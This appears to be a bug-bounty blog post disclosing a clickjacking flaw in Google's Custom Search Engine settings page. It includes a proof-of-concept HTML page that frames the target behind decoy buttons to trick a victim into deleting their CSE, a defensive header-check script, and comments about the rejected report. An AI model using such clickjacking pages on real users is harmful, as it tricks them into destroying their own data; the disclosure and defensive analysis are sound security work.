While I was testing, I found that cse.google.com is vulnerable to clickjacking, so I checked whether the settings page is vulnerable or not, and it was. So now this has a risk: the attacker could delete someone's CSE.
Summary: An attacker can delete a victim's CSE.
Steps to reproduce:
- Go to https://cse.google.com/
- The page sends nothing that prevents framing, so it can be embedded in an iframe on any web page.
- The attacker crafts an HTML page that lays decoy buttons over the framed settings page, so the victim's clicks land on the controls that delete their CSE.
I wrote a proof-of-concept page for the clickjacking; here is the code:
```html
<!-- Decoy "game": the numbered buttons are placed where the delete controls of the framed settings page land -->
<center>
<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<!-- The target is framed full-screen on top of the decoys. opacity: 1 keeps it visible for the demo;
     in a real attack it is set close to 0 so the victim sees only the decoys while the clicks hit the frame. -->
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>
</center>
```
Using this clickjacking technique, an attacker can make a victim unknowingly delete their CSE.
For how the attacker makes the victim unknowingly delete their CSE, see my video PoC here:
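Whether a page can be framed at all comes down to two response headers: X-Frame-Options and a Content-Security-Policy frame-ancestors directive. The check below is an added example written for this page, not code from the original post or from Google; it decides, from a set of headers, whether a target page can be loaded in an iframe on a given attacker origin. The header sets, the attacker origin https://attacker.example and the helper names are constructed for the example.

```javascript
// Decide whether a page can be rendered inside an <iframe> on a given
// top-level page, judging only by its anti-framing response headers.
// All header sets and origins below are constructed sample values.

const DEFAULT_PORT = { https: '443', http: '80' };

function parseOrigin(url) {
  const u = new URL(url);
  const scheme = u.protocol.replace(':', '');
  return { scheme, host: u.hostname, port: u.port || DEFAULT_PORT[scheme] || '' };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Match one CSP frame-ancestors source expression against the framing origin.
// 'self' refers to the origin of the framed (target) document.
function sourceMatches(src, framer, target) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return sameOrigin(framer, target);
  if (s === '*') return true;
  // scheme-only source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.scheme === s.slice(0, -1);
  // host source: [scheme://][*.]host[:port]
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme !== framer.scheme) return false;
  if (wildcard ? !framer.host.endsWith('.' + host) : framer.host !== host) return false;
  if (port === undefined) return framer.port === DEFAULT_PORT[framer.scheme];
  return port === '*' || port === framer.port;
}

// true  -> the target can be framed by framerUrl (clickjacking is possible)
// false -> the browser refuses to render the frame
function canBeFramed(targetUrl, framerUrl, headers) {
  const target = parseOrigin(targetUrl);
  const framer = parseOrigin(framerUrl);
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));

  // A CSP frame-ancestors directive, when present, takes precedence over X-Frame-Options.
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    if (sources.length === 0) return false;            // empty source list blocks all framing
    return sources.some(src => sourceMatches(src, framer, target));
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return sameOrigin(framer, target);
  // No header, or a value current browsers ignore (e.g. ALLOW-FROM): the page is frameable.
  return true;
}

// Worked report: the vulnerable state described in the post beside two fixed variants.
function report() {
  const target = 'https://cse.google.com/';
  const attacker = 'https://attacker.example/';
  const cases = {
    noHeaders: {},                                                   // what the post describes
    xfoDeny: { 'X-Frame-Options': 'DENY' },
    cspNone: { 'Content-Security-Policy': "frame-ancestors 'none'" },
  };
  return Object.fromEntries(Object.entries(cases).map(([name, hdrs]) => [name, canBeFramed(target, attacker, hdrs)]));
}

console.log(report());
```

The report function compares the state the post describes (no anti-framing headers, so the settings page loads in the attacker's iframe) with the two server-side fixes that would have stopped this proof of concept. The check reads the CSP directive first because browsers that support frame-ancestors ignore X-Frame-Options when both are present, so a permissive frame-ancestors list silently overrides a DENY.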
Enough about the explanation.
Okay, the problem has just begun. In my opinion, my findings above are valid bugs. Why? Because the attacker can delete someone's data (their CSE); isn't that a bug? But the response I got was very surprising.
The part that confuses me is: how is this not a bug? Because in my head it is clear that I can delete other people's data.
What do you think? Is this a bug? Or is it just me who overestimates this as a bug?
Top comments
I honestly don’t get “Why is this an issue and not just annoying?”. Anything that’s annoying is an issue, no matter what. Whoever you’re talking to probably doesn’t want to bother fixing it. He even marked it as intended behavior.
Heck, one could set up a script to repeatedly do this to a site, so they wouldn’t be able to use Google CSE. If that happened to a few sites, I bet he would be quick to get something done about it.
That was the first time I reported a bug to Google. After getting a response like that I somehow felt down. Crap.